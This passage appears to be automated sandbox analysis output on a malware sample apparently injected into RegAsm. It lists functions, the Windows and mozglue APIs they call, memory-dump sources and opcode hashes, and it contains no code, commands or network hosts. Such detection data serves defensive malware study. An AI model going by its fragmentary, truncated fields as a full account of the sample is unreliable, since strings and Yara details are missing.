                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040F514
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                                                                                  • String ID: LpB$@
                                                                                                                                                                                                                                                                                                  • API String ID: 3728558374-1565407916
                                                                                                                                                                                                                                                                                                  • Opcode ID: ca0a715389841535aa54f65f476655908351ce493131d4d21d17ec373f46aef7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 36e5075b6a10c60e39c5ab8d7a4802c09e0a4f3ec3a0c1e1d2f3810fb1fc35a5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca0a715389841535aa54f65f476655908351ce493131d4d21d17ec373f46aef7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4E06C7190020876DB24EFB5E8615DF77589F50358F00827FFD1551581EB38E65C86A9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C840C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C840CD5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C82F9A7
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C840D40
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C840DCB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C840DDD
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C840DF2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4069420150-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 640c7d8cfad0a948cbf104cda75287c41a52a2a2a430dc8ac1bf7ccdbe0b94ea
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6b223cdf3ff0dc7347989780d6ff2249cd460cb5ef358d9ec34b301f28d90746
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 640c7d8cfad0a948cbf104cda75287c41a52a2a2a430dc8ac1bf7ccdbe0b94ea
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C4106719087848BD730CF29C28079BFBE5BFD9614F518A2EE8D887B51D7709548CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C84CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84CDA4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C84D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C84CDBA,00100000,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84D158
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C84D130: InitializeConditionVariable.KERNEL32(00000098,?,6C84CDBA,00100000,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84D177
                                                                                                                                                                                                                                                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84CDC4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C847480: ReleaseSRWLockExclusive.KERNEL32(?,6C8515FC,?,?,?,?,6C8515FC,?), ref: 6C8474EB
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84CECC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: mozalloc_abort.MOZGLUE(?), ref: 6C80CAA2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C84CEEA,?,?,?,?,00000000,?,6C83DA31,00100000,?,?,00000000), ref: 6C83CB57
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C83CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C83CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C84CEEA,?,?), ref: 6C83CBAF
                                                                                                                                                                                                                                                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C83DA31,00100000,?,?,00000000,?), ref: 6C84D058
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 861561044-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: e627bb4813b9ad9d1afad87619a4017ac6b9aafeea007a36cbab70c8455060ea
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e9c09853ec4c143c88dc51497e5ee24e29f5b502984b70fb21274f4b48f42f9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e627bb4813b9ad9d1afad87619a4017ac6b9aafeea007a36cbab70c8455060ea
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3D17171A04B469FD718CF28C580799F7E1BF99308F018A2DD85987712EB71E9A5CBC1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C815C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTickCount64.KERNEL32 ref: 6C815D40
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C815D67
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C815DB4
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C815DED
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 557828605-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 484c02619ae84f9191f7f570674447f18ed104c1204544f6cc6a180377c54108
                                                                                                                                                                                                                                                                                                  • Instruction ID: 73858fdc1c0de2ca49d0058051b95a29109e6cd0a893e096729b482e5ff32325
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 484c02619ae84f9191f7f570674447f18ed104c1204544f6cc6a180377c54108
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB515071E0422A8FCF29CF69C958AAEB7B1FB55308F194A29D811A7B50D7306D45CBE0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7FCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7FCEBD
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C7FCEF5
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C7FCF4E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                                                  • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0287a598e04f778db4bec32e75e5f40f885ea49f5e318db116d0d8ff622624cc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3b29af0f3732a63476b81d04f83dfe91de0fc0efd8798e5ab0dc3e25b292b01f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0287a598e04f778db4bec32e75e5f40f885ea49f5e318db116d0d8ff622624cc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A051F276A002568FCB10CF18C490AAAFBA5EF99304F1985ADD8595F752D731AD06CBE0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410580 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105A2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 004105B0
                                                                                                                                                                                                                                                                                                  • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105E8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113F0: GetProcessHeap.KERNEL32(00000000,?,?,0041061B,00000000,?,?,00000001), ref: 004113FD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113F0: HeapFree.KERNEL32(00000000,?,0041061B,00000000,?,?,00000001), ref: 00411404
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410632
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 837085947-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7142a04b867447fb878fb411af41ecc30bccfe7f2d8a20bca0ef5d8592954710
                                                                                                                                                                                                                                                                                                  • Instruction ID: 289815751ebd35c72ea03ef0ba3f0a3266975d2c7879701a2055e72ba72b2a7f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7142a04b867447fb878fb411af41ecc30bccfe7f2d8a20bca0ef5d8592954710
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0214832E01128A7DB209B59BC40AEFB769EF80714F1401BBFD08D7301E6799ED586DA
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C836470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C8382BC,?,?), ref: 6C83649B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8364A9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA80: GetCurrentThreadId.KERNEL32 ref: 6C82FA8D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA80: AcquireSRWLockExclusive.KERNEL32(6C87F448), ref: 6C82FA99
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C83653F
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C83655A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2537303c6362104453506b40d6223bc78ac3f08c3b4067fbfe49160d18e8c47d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9bde2f6bd1c7e362602e41df21a3ed2e77feb0f4254ec9d0727f9abb00474591
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2537303c6362104453506b40d6223bc78ac3f08c3b4067fbfe49160d18e8c47d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A83161B5A043159FD710CF18D98469EBBE4BF89314F10483EE85A97741DB34E919CBD2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040EFD2 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen
                                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                                  • API String ID: 39653677-216407459
                                                                                                                                                                                                                                                                                                  • Opcode ID: bddf88c0abcb4268c28f741b0b3d1145135c3506dd44be8223359e2e552889f1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 586e559a67b8a01048113c396d4c7d94b90e26c39f3bd1f8157520b2b5093f26
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bddf88c0abcb4268c28f741b0b3d1145135c3506dd44be8223359e2e552889f1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B216A3690425956CB309A69D4513EEF3E5DF40364F04407BDC04A7783E27D5A4AC7AA
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C80B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C80B4F5
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C80B502
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C80B542
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C80B578
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0459e11445f53309a9dd8441a62b319ad9197b255813094dedc9b56f03674036
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2eb07a06f263d60da31e16658d84af6e392f2d96c790354e6629fd20e02fcc7b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0459e11445f53309a9dd8441a62b319ad9197b255813094dedc9b56f03674036
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1119331A04B55C7D7328F29CA08766B3B1FF9631CF145B5AD84953A01FB71A1D5C7A0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0041A359 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                  • Instruction ID: 97fc0a933dee083fed17baac24070638f9515ca843bfd1ffe92575c99e082334
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B118C3204114EFFCF126E94DC01DEE3F22BB08354F588416FE2899135C23AC9B2AB86
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

